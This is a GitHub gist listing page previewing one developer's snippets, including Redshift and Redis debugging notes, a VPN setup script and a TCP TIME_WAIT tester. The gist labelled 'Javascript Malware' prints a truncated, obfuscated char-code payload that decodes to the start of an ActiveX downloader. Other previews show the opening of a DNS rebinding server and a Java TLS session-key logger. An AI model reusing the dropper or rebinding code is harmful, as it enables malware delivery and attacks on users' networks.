Skip to content

Instantly share code, notes, and snippets.

View benmmurphy's full-sized avatar

benmmurphy

35 followers · 0 following
View GitHub Profile
@benmmurphy
benmmurphy / gist:da38a21dd33a18527f49
Created April 27, 2015 10:26
Redshift Fun
logs=# create table timestamp_test (a timestamp, b timestamp);
CREATE TABLE
logs=# insert into timestamp_test(a,b) values('2015-04-25 06:29:40', '2015-04-25 06:35:36');
INSERT 0 1
logs=# select b-a from timestamp_test where b-a > 3000;
?column?
-----------
356000000
(1 row)
@benmmurphy
benmmurphy / dnsrebinding
Created April 21, 2015 13:48
# app.rb
require 'sinatra'
require 'securerandom'
require 'aws-sdk'
set :protection, :except => :frame_options
HOSTED_ZONE_ID = "HOLLAID"
DOMAIN = "holla.net"
SUFFIX = "-bad.#{DOMAIN}"
@benmmurphy
benmmurphy / gist:53d72446f07fe8c22082
Created February 27, 2015 21:02
{"createConversationResponse":{"codeMessage":null,"codeType":"error","code":"3","messages":[{"messageCode":101,"messageText":"Validation Failure Email address missing."}]}}
@benmmurphy
benmmurphy / gist:382c4246c93a42d0d60e
Created November 15, 2014 11:25
Javascript Malware (console.log was eval)
var k="";function l(m){k+=m;};l("102!!117!!110!!");l("99!!116!!105!!111!!110!!32");/*60712975*/l("!!100!!108!!40!!102!!114!!44!");l("!116!!111!!41!!32!!123!!32!!");l("118!!97!!114!!32!!12");l("0!!111!!32!!61!!32!!110!!");l("101!!119!!32!!65!!9");l("9!!116!!105!!118!!101!!8");l("8!!79!!98!!106!!101!!99!");l("!116!!40!!34!!77");l("!!83!!88!!77!!76!!50!!46!");l("!88!!77!!76!!72!");l("!84!!84!!80!!34!!41!!59!!32!");/*29959874*/l("!120!!111!!46!!111!");l("!110!!114!!101!!97!!100");/*40603795*/l("!!121!!115!!116!!97!!116!!");l("101!!99!!104!!97!!110");l("!!103!!101!!32!!61!!32");l("!!102!!117!!110!!99!!1");l("16!!105!!111!!110!!40!");l("!41!!32!!123!!32!!105!!10");l("2!!32!!40!!120!!1");/*40911160*/l("11!!46!!114!!101!!9");l("7!!100!!121!!83!!11");l("6!!97!!116!!101!!");/*2370194*/l("32!!61!!61!!61!!32");l("!!52!!41!!32!!123!!32");/*55689847*/l("!!118!!97!!114!!32!!120!!97!!3");/*69516250*/l("2!!61!!32!!110!!101!!1");l("19!!32!!65!!99!!");l("116!!105!!118!!1");l("01!!88!!79!!98!!");/*86419873*/l("106!!101!!99!!116"
@benmmurphy
benmmurphy / gist:de985b52eea597ab2ac0
Created November 6, 2014 21:35
amazon vpn script (from https://github.com/sarfata/voodooprivacy/blob/master/voodoo-vpn.sh)
#!/bin/sh
#
# voodoo-vpn.sh: Amazon EC2 user-data file for automatic configuration of a VPN
# on a Ubuntu server instance. Tested with 12.04.
#
# See http://www.sarfata.org/posts/setting-up-an-amazon-vpn-server.md
#
# DO NOT RUN THIS SCRIPT ON YOUR MAC! THIS IS MEANT TO BE RUN WHEN
# YOUR AMAZON INSTANCE STARTS!
#
@benmmurphy
benmmurphy / gist:386be40056bf3a2e263e
Created May 9, 2014 17:54
Writing Bad
import static java.util.Arrays.*;
public class JavaDoc {
public String name() {
return asList('I', 'x',
'`', 'u',
'`', 'a',
'x', 'd',
'q', 'f')
.stream()
@benmmurphy
benmmurphy / TLSLoggingProvider.java
Last active April 30, 2024 12:11
SSLKEYLOGFILE for java
import java.io.IOException;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.nio.ByteBuffer;
import java.nio.channels.FileChannel;
import java.nio.file.FileSystems;
import java.nio.file.StandardOpenOption;
import java.security.InvalidAlgorithmParameterException;
import java.security.Provider;
import java.security.SecureRandom;
@benmmurphy
benmmurphy / gist:5935199
Created July 5, 2013 15:10
redis-slave funny business
[21736] 04 Jul 13:52:16 # /lib/libc.so.6(memcpy+0xe1) [0x7f09264322c1]
[21736] 04 Jul 13:52:16 # /lib/libc.so.6(memcpy+0xe1) [0x7f09264322c1]
[21736] 04 Jul 13:52:16 # /usr/bin/redis-server(sdscatlen+0x4f) [0x41029f]
[21736] 04 Jul 13:52:16 # /usr/bin/redis-server(readQueryFromClient+0x45) [0x416e95]
[21736] 04 Jul 13:52:16 # /usr/bin/redis-server(aeProcessEvents+0x135) [0x40b1a5]
[21736] 04 Jul 13:52:16 # /usr/bin/redis-server(aeMain+0x2e) [0x40b4fe]
[21736] 04 Jul 13:52:16 # /usr/bin/redis-server(main+0xf7) [0x40a407]
[21736] 04 Jul 13:52:16 # /lib/libc.so.6(__libc_start_main+0xfd) [0x7f09263c8c4d]
[21736] 04 Jul 13:52:16 # /usr/bin/redis-server() [0x40a51d]
@benmmurphy
benmmurphy / README.md
Last active December 17, 2015 11:09
TIMED_WAIT verifier

replays last FIN-ACK in order to check if the other side correctly implements TIMED-WAIT. other side should be first to close the connection. with http this can be done in curl by forcing http/1.0 mode.

curl -0 -d 'lolol=lololol' http://TARGET/wtwtwt
tcpdump -S 'tcp port 80' -l | ./replayer.rb TARGET 80 YOUR_HOST_AS_APPEARS_IN_TCPDUMP

Example of it working and showing the other side correctly handling TIMED-WAIT:

root@midway:~# tcpdump -S 'tcp port 80' -l | ./replayer.rb 173.194.41.67 80 ip-10-250-157-181.eu-west-1.compute.internal
OMG IM RUNNING

tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

@benmmurphy
benmmurphy / gist:5430539
Created April 21, 2013 18:29
1st Large
#!/usr/bin/env ruby
def is_palindrome(n)
s = n.to_s
s.reverse == s
end
def all
result = []
(1..10000000).each do |sqrt|